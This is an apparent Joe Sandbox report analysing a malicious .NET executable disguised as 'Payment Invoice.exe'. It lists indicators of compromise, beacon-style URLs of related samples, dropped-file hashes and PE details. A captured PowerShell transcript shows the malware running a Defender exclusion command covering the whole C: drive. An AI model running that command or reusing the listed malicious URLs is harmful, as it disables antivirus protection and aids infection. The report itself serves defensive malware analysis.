Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 104.43.193.48, 13.88.21.125, 104.43.139.144, 20.50.102.62, 92.122.213.247, 92.122.213.194, 52.155.217.156, 2.20.142.210, 2.20.142.209, 20.54.26.129, 104.42.151.234, 20.82.210.154, 52.255.188.83, 52.147.198.201 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:40:18	API Interceptor	20x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.185.159.144	INQUIRY 1820521 pdf.exe	Get hash	malicious	Browse	www.mobcitylabs.com/gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT
	sgJRcWvnkP.exe	Get hash	malicious	Browse	www.aldlan-studio.com/svh9/?EZA4iv=iUgadD8kb6gMm/UthcIeLrQXBXKqEwA1IwoQkb8SyhCa1CCH2tdbgVRBTGVl6GtCHz6WbdtHlg==&GzuLH=VBZtT83HH6GhB4
	remittance info.xlsx	Get hash	malicious	Browse	www.makingwaves.design/svh9/?5ja0c8yp=HlxAPFB4jZ3NXox3gOhW2mb89mcrhBqsxr7jk8SFshbVhphDLQeHIc6bZtAlCAGtmfvtHQ==&2dn4M=z4DhUBy8
	36ne6xnkop.exe	Get hash	malicious	Browse	www.totally-seo.com/p2io/?1bVpY=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MoCWZBvIMUw&TVg8Ar=tFNd1Vlhj2qp
	mW07jhVxX5.exe	Get hash	malicious	Browse	www.creationsbyjamie.com/nsag/?Jry=uVd8K&MHQD=ikjZmpp02NVieHaNLwg8/vzbnsAf6IhlNdOODdzSNMaisic822ysYeH69uqv2TJux/MF
	NEW ORDER ELO-05756485.exe	Get hash	malicious	Browse	www.gammacake.com/riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls
	PO45937008ADENGY.exe	Get hash	malicious	Browse	www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl
	LWlcpDjYIQ.exe	Get hash	malicious	Browse	www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV
	RCS76393.exe	Get hash	malicious	Browse	www.pimpmyrecipe.com/goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz
	PO4308.exe	Get hash	malicious	Browse	www.alchemistslibrary.com/pnqr/?X2JtjTX8=z9nKZcvAPWzUQhY9y3T5XVIzOkQhxhUtd7CKHZyMoghVgOSKx+Fjs7sJEQh08Ts7gk8yJD62ag==&bl=TVItEdNXpFHh
	TazxfJHRhq.exe	Get hash	malicious	Browse	www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu
	Order Inquiry.exe	Get hash	malicious	Browse	www.getgenevieved.com/r4ei/?9rQl2=wFNtQXbP&t6Ad=lOfuxtPF4il1Jf5EERhirk3Wdt+b9SUzBWaFyElm1rRKZL2x7wuCbVuufCM8qdhuJ86n
	TACA20210407.PDF.exe	Get hash	malicious	Browse	www.cindybelardo.com/qqeq/?oX=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr976CPGLkKL8&sBZ8qr=Fxl8FxGPjJo8-
	New Order.exe	Get hash	malicious	Browse	www.radiorejekts.com/gwam/?Iry=ONtj9W7nV9ZGpEHVJNfDlWrNbkpYgiFClGnoUoEoQiKZyCXOLwMg6K6LKjWWFncBTlNA&ob30vr=S0Glx8
	SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe	Get hash	malicious	Browse	www.cindybelardo.com/qqeq/?UR-TRLn=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr+bASemz+tq7&P6u=Hb9l0TTXQ4NLhX
	New PO#700-20-HDO410444RF217,pdf.exe	Get hash	malicious	Browse	www.xomonroe.com/evh4/?vR-lx=mUKuFt7Jt/u71c4PSt38ziCZS3BUg2e8LD2S6eZiZC4IumnTujc05pOAm4tUdXdaGNCmokkeSA==&E8LHll=jfIX5LDxkxdhJTgP
	New Month.exe	Get hash	malicious	Browse	www.ussouthernhome.com/nppk/?kfIXa4=PcNj3q/CMcdvPYJC9A1ueSg5wRTqWaK9K+KWTMGfE5xIowphBNT+eHYPWkjoOWig7+Qi&XP0=ybFLQT2H0FsXBx
	QUOTATION REQUEST.exe	Get hash	malicious	Browse	www.markrobersticker.com/aun3/?YrIHdvPX=r/YBW9ssF3S+2poRG61gcf3j1YCgKIjwgQz6XW4ODbs5DL3PWKC9kUAY5ABsTG3sD74i&Dzut_N=3fm0
	new built.exe	Get hash	malicious	Browse	www.amymako.com/klf/?TlX=YvLT&t8o=YIBPr2PP4TUydPzAxpqYzoT8Fd3d4uq1lz450j/EP32B3j2OHU2eBgUME3q0XrkiC9k9
	Invoice.xlsx	Get hash	malicious	Browse	www.aratssycosmetics.com/iu4d/?L2JH=uKRUrjhLA6aGoerdjROgrXpkE9A34BbuVfDDyYeArPtVUwLJNjfP2xipo2Au/YQGKskRiw==&0n=fxlp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ext-cust.squarespace.com	sgJRcWvnkP.exe	Get hash	malicious	Browse	198.185.159.144
	remittance info.xlsx	Get hash	malicious	Browse	198.185.159.144
	NEW ORDER ELO-05756485.exe	Get hash	malicious	Browse	198.185.159.144
	RCS76393.exe	Get hash	malicious	Browse	198.185.159.144
	PO4308.exe	Get hash	malicious	Browse	198.185.159.144
	PO#41000055885.exe	Get hash	malicious	Browse	198.49.23.144
	SHIPPING DOCUMENTS.exe	Get hash	malicious	Browse	198.185.159.144
	invoice bank.xlsx	Get hash	malicious	Browse	198.185.159.144
	Y79FTQtEqG.exe	Get hash	malicious	Browse	198.185.159.144
	UAE MINISTRY OF HEALTH MEDICAL EQUIPMENT SUPPLY TENDER.exe	Get hash	malicious	Browse	198.49.23.144
	Scan copy 24032021_jpeg.exe	Get hash	malicious	Browse	198.185.159.144
	PO032321.exe	Get hash	malicious	Browse	198.185.159.144
	Copia De Pago_pdf.exe	Get hash	malicious	Browse	198.49.23.145
	V90Y4n0acH.exe	Get hash	malicious	Browse	198.185.159.145
	Dgm2Yseey2.exe	Get hash	malicious	Browse	198.185.159.144
	winlog.exe	Get hash	malicious	Browse	198.185.159.144
	payment slip_pdf.exe	Get hash	malicious	Browse	198.185.159.144
	wFzMy6hehS.exe	Get hash	malicious	Browse	198.49.23.145
	INCHAP_Invoice_21.xlsx	Get hash	malicious	Browse	198.49.23.145
	ffOWE185KP.exe	Get hash	malicious	Browse	198.49.23.145

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SQUARESPACEUS	INQUIRY 1820521 pdf.exe	Get hash	malicious	Browse	198.185.159.144
	sgJRcWvnkP.exe	Get hash	malicious	Browse	198.185.159.144
	remittance info.xlsx	Get hash	malicious	Browse	198.185.159.144
	36ne6xnkop.exe	Get hash	malicious	Browse	198.185.159.144
	mW07jhVxX5.exe	Get hash	malicious	Browse	198.185.159.144
	NEW ORDER ELO-05756485.exe	Get hash	malicious	Browse	198.185.159.144
	PO45937008ADENGY.exe	Get hash	malicious	Browse	198.185.159.144
	LWlcpDjYIQ.exe	Get hash	malicious	Browse	198.185.159.144
	RCS76393.exe	Get hash	malicious	Browse	198.185.159.144
	PO4308.exe	Get hash	malicious	Browse	198.185.159.144
	TazxfJHRhq.exe	Get hash	malicious	Browse	198.185.159.144
	Order Inquiry.exe	Get hash	malicious	Browse	198.185.159.144
	PO#41000055885.exe	Get hash	malicious	Browse	198.49.23.144
	TACA20210407.PDF.exe	Get hash	malicious	Browse	198.185.159.144
	New Order.exe	Get hash	malicious	Browse	198.49.23.144
	New Order.exe	Get hash	malicious	Browse	198.185.159.144
	SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe	Get hash	malicious	Browse	198.185.159.144
	DHL Shipping Documents.exe	Get hash	malicious	Browse	198.49.23.145
	New PO#700-20-HDO410444RF217,pdf.exe	Get hash	malicious	Browse	198.185.159.144
	New Month.exe	Get hash	malicious	Browse	198.185.159.144

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Invoice.exe.log Download File
Process:	C:\Users\user\Desktop\Payment Invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1119
Entropy (8bit):	5.356708753875314
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
MD5:	3197B1D4714B56F2A6AC9E83761739AE
SHA1:	3B38010F0DF51C1D4D2C020138202DABB686741D
SHA-256:	40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
SHA-512:	58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.996142136926143
Encrypted:	false
SSDEEP:	384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
MD5:	B7D3A4EB1F0AED131A6E0EDF1D3C0414
SHA1:	A72E0DDE5F3083632B7242D2407658BCA3E54F29
SHA-256:	8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
SHA-512:	F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22148
Entropy (8bit):	5.602144632803491
Encrypted:	false
SSDEEP:	384:MtCDLTTnRUBZ60Xb1YSBKnuultIti7Y9gNSJUeRS1BMrmLZ1AV7ObWQ+64I+iNq:uIO24KuultS2NXexa46gp
MD5:	337D36F8B0DFD690717566FD034ECBDA
SHA1:	E28D1BC9D0C05DB111D21B9B56E12C340312E2D2
SHA-256:	0D9E00432D965BE17ED8B482C9A1490595DE1D653B44F085269629F910490E62
SHA-512:	1FF178EAC94BE9B5DAB1D47E1AB6C07298A76301A2C058B1215E4CD78E0D45905FA1E07BBBFCFA2903DE62DFC87F177948B7A3D59B96610B7CBDAEB58A356A26
Malicious:	false
Reputation:	low
Preview:	@...e...........Y.......................1............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\Payment Invoice.exe Download File
Process:	C:\Users\user\Desktop\Payment Invoice.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	669184
Entropy (8bit):	7.3745607474678545
Encrypted:	false
SSDEEP:	12288:5NkKNu55RIPDQRPo1eviHXJgoYcgMuwS2T8Xo2i10OlYa:5qKvPDQpweiXJ3YxFWgXhr
MD5:	EBFEAA73811B084FF7EC882503205988
SHA1:	893E9FD1B6F1CCB56DBC389799B93ECBF116EE74
SHA-256:	BDE02A4B70A0070B28F0E812F6F7A857F2D57E2C8B6F3D0F11C9BB6A66CDC05A
SHA-512:	7EBB8A1ACE821C96A3BFB2F1FB3681CC7E3D2B05A6AB9D43836480FA33E6E6591A5486BD87AA61EA2CAEF4FF2530DE79F9BFCF1E8967D043C067B24CDD2CFD75
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t`................................. ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc...............4..............@..B........................H............5......a....I...M...........................................(....(&......z.(......}.....(....o....}......0...........{............3.....(.......................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X ...Q.{....Xa}......}.....{....oq...:q....(....+..(........}.........(......*................n..}.....{....,..{....o.

C:\Users\user\AppData\Local\Temp\Payment Invoice.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Payment Invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fadwgx3r.s0c.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kjrrcpza.p2b.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\Documents\20210412\PowerShell_transcript.928100.nThv75WD.20210412143952.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5048
Entropy (8bit):	5.379411003713336
Encrypted:	false
SSDEEP:	96:BZyjGN5yqDo1ZrZpjGN5yqDo1ZXM6UjZ5AjGN5yqDo1ZmFEEjZc:Jl7I
MD5:	8ADE5B7E77BEE476B7AF344E622A0DC6
SHA1:	5008794A9D51EBE326E921D646C2FCC402CB33B3
SHA-256:	3430F2A5985A82FB63F3D976729F5956ED7E7CE817CA18FA7CC828E01BFC65EE
SHA-512:	52A451514B5FE6418176A9B959964BA3266D6306EC848B943821A31FE162AB25481163B0EBE0373A02B6223711B56287CD6CADD14B796D5FDD78DEEA5995BCD5
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210412144009..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210412144009..******************..PS>Add-MpPreference -ExclusionPath C:\..********************..Windows PowerShell transcript start..Start time: 20210412144312..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.3745607474678545
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Payment Invoice.exe
File size:	669184
MD5:	ebfeaa73811b084ff7ec882503205988
SHA1:	893e9fd1b6f1ccb56dbc389799b93ecbf116ee74
SHA256:	bde02a4b70a0070b28f0e812f6f7a857f2d57e2c8b6f3d0f11c9bb6a66cdc05a
SHA512:	7ebb8a1ace821c96a3bfb2f1fb3681cc7e3d2b05a6ab9d43836480fa33e6e6591a5486bd87aa61ea2caef4ff2530de79f9bfcf1e8967d043c067b24cdd2cfd75
SSDEEP:	12288:5NkKNu55RIPDQRPo1eviHXJgoYcgMuwS2T8Xo2i10OlYa:5qKvPDQpweiXJ3YxFWgXhr
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t`................................. ........@.. ....................................@................................

File Icon


Icon Hash:	206ae682a280a906

Static PE Info

General
Entrypoint:	0x47cbe6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60740DFE [Mon Apr 12 09:08:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7cb8c	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7e000	0x284fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7abec	0x7ac00	False	0.97593002164	data	7.98286833797	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x7e000	0x284fc	0x28600	False	0.0286861455108	data	3.19160978616	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa8000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x7e2b0	0x4f2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x7e7a4	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 4278496986, next used block 4278496986
RT_ICON	0x8efcc	0x94a8	data
RT_ICON	0x98474	0x5488	data
RT_ICON	0x9d8fc	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0
RT_ICON	0xa1b24	0x25a8	data
RT_ICON	0xa40cc	0x10a8	data
RT_ICON	0xa5174	0x988	data
RT_ICON	0xa5afc	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xa5f64	0x84	data
RT_VERSION	0xa5fe8	0x360	data
RT_MANIFEST	0xa6348	0x1b4	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2020
Assembly Version	1.0.0.0
InternalName	Mstkztz.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments	Excel Macro Exploit
ProductName	Excel Macro Exploit
ProductVersion	1.0.0.0
FileDescription	Excel Macro Exploit
OriginalFilename	Mstkztz.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 14:41:19.252121925 CEST	49760	80	192.168.2.4	198.185.159.144
Apr 12, 2021 14:41:19.382915020 CEST	80	49760	198.185.159.144	192.168.2.4
Apr 12, 2021 14:41:19.383065939 CEST	49760	80	192.168.2.4	198.185.159.144
